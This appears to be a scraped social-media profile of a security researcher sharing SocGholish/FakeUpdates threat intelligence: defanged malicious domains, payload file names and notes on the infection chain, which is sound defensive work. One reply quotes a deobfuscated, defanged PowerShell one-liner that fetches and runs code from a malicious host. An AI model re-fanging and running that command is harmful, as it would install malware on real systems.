Malware Brandon

@Malware_Brandon

Security Researcher

Joined September 2024

145 Following

122 Followers

48 Posts

Pinned Tweet

Malware Brandon @Malware_Brandon

over 1 year ago

1/X Here's some details on recent SOCGholish / FakeUpdates initial infections and the TDS (Keitaro?) that goes along with it. This loader uses compromised sites to display a fake "browser update" themed lure that, when clicked, downloads the malware.

Malware_Brandon's tweet photo. 1/X
Here's some details on recent SOCGholish / FakeUpdates initial infections and the TDS (Keitaro?) that goes along with it. This loader uses compromised sites to display a fake "browser update" themed lure that, when clicked, downloads the malware. https://t.co/NHSoWTqMal

4

52

15

28

6K

Malware Brandon @Malware_Brandon

3 months ago

New SocGholish / FakeUpdates Stage-3 domain of the day: * snap[.]promantree[.]com Stage-2 Script that calls it: https://t.co/YB2U4V1fjJ

0

4

1

1

229

Malware Brandon @Malware_Brandon

3 months ago

New SocGholish Stage-3 domain: * api-app[.]uppercrafteroom[.]com Being served up by previously seen Stage-2: * content-website-analytics[.]com/script[.]js

0

2

1

0

200

Malware Brandon @Malware_Brandon

3 months ago

(4/4) You can find all of these and ones I've listed in the past on my GitHub: https://t.co/NYM1diqv14 #SocGholish

0

13

6

9

4K

Malware Brandon @Malware_Brandon

3 months ago

(1/4) Several new SocGholish Stage-3 domains from the past month or so, with their respective VT Stage-2 script when available: • webmail[.]drainbusters1[.]com •• https://t.co/bd6A6Nunmc •• https://t.co/kBWtmEYkC5 • cpanel[.]sbkollel[.]org •• https://t.co/0iAt3l0o5c

1

8

2

2

860

Malware Brandon @Malware_Brandon

3 months ago

(3/4) • webdisk[.]housecleaninggrovecityohio[.]com •• https://t.co/JrYGL0D3A8 • support[.]grovecityelectrician[.]com

1

3

1

0

259

Malware Brandon @Malware_Brandon

4 months ago

5/5 A lot of newer compromised sites I'm seeing are skipping the old Stage-2 script and directly calling the Stage-3 domain. #SocGholish #FakeUpdates

0

0

0

0

75

Malware Brandon @Malware_Brandon

4 months ago

1/X Several new SocGholish infrastructure (Stage-2 / Stage-3) domains added to the list from the past couple of months: https://t.co/NYM1dir2QC

1

1

0

0

118

Malware Brandon @Malware_Brandon

4 months ago

4/X New file name for the Chrome Payload as well. Previous name: New Version (Click).js New name: Google Launcher.js Firefox and Edge filenames still seem the same: FF: MozillaUpdater.zip->Firefox.js Edge: <11 random alphanumeric chars>.js

1

0

0

0

74

Malware Brandon @Malware_Brandon

9 months ago

- updates[.]highendmark[.]com - Stage-2 Script Calling this: https://t.co/MMLtuJpq5Y - vps[.]denissalazar[.]com - Stage-2 Script Calling this: https://t.co/kbk3057MMt - devel[.]asurans[.]com - https://t.co/L8AyLYZWSm

0

0

0

0

89

Malware Brandon @Malware_Brandon

9 months ago

Some new SocGholish Stage-3 domains observed in the last few days: - updates[.]highendmark[.]com - vps[.]denissalazar[.]com - devel[.]asurans[.]com Updated my list of infrastructure (Stage2 & Stage3) with some others seen in the past few months as well: https://t.co/NYM1dir2QC

1

0

0

0

157

Malware Brandon @Malware_Brandon

about 1 year ago

@SecRiot Looks like the .js executes some slightly obfuscated Powershell; just some basic string replacement and decimal->char conversion. Deobfuscates to "iex curl -useb hxxp://naybvyzvemm[.]top/f22[.]svg" (defanged)

0

1

0

0

87

Malware Brandon @Malware_Brandon

about 1 year ago

@SecRiot Looks like SocGholish. The compromised site reaches out to getmanyme[.]com/privacy/i18min[.]js which is the Stage-2, which reaches out to to the Stage-3 at static[.]twalls5280[.]com for some criteria checking and for the payload

1

1

0

0

67

Malware Brandon @Malware_Brandon

over 1 year ago

Shout out to the following who have recently posted their analysis on #SocGholish and other #FakeUpdates threats in the past few weeks: @TRACLabs_ @RussianPanda9xx @threatinsight @Intel471Inc @GoogleCloudSec Hope this list helps some people out there with their own analysis.

1

2

0

1

292

Malware Brandon @Malware_Brandon

over 1 year ago

Finally getting around to sharing the SocGholish infrastructure I've observed over the last year or two. Comprises of known initial Stage-2 and Stage-3 domains as well as the respective Stage-2 scripts found on VirusTotal. https://t.co/NYM1dir2QC

Malware_Brandon's tweet photo. Finally getting around to sharing the SocGholish infrastructure I've observed over the last year or two. Comprises of known initial Stage-2 and Stage-3 domains as well as the respective Stage-2 scripts found on VirusTotal.
https://t.co/NYM1dir2QC https://t.co/H55IJIU2Po

1

65

11

26

5K

Malware_Brandon retweeted

Google Cloud Security @GoogleCloudSec

over 1 year ago

Mandiant's latest blog post in the "Finding Malware" series dives deep into Fake Browser Update Attacks! 👾 Learn how these attacks use social engineering to deliver malicious payloads like FAKEUPDATES, FAKESMUGGLES, and FAKETREFF. Read the full post: https://t.co/Ie82qcgJES

GoogleCloudSec's tweet photo. Mandiant's latest blog post in the "Finding Malware" series dives deep into Fake Browser Update Attacks! 👾 Learn how these attacks use social engineering to deliver malicious payloads like FAKEUPDATES, FAKESMUGGLES, and FAKETREFF.

Read the full post: https://t.co/Ie82qcgJES https://t.co/Vuo5g78r0T

0

2

2

3

458

Malware Brandon @Malware_Brandon

over 1 year ago

@pancak3lullz @x3ph1 There's a few users on here that regularly post SmartapeSG IOCs but also @MonitorSG on infosec[.]exchange posts frequently about it as well if you want to get some more insight

1

2

0

0

192

Last Seen Users on Sotwe

Trends for you

Most Popular Users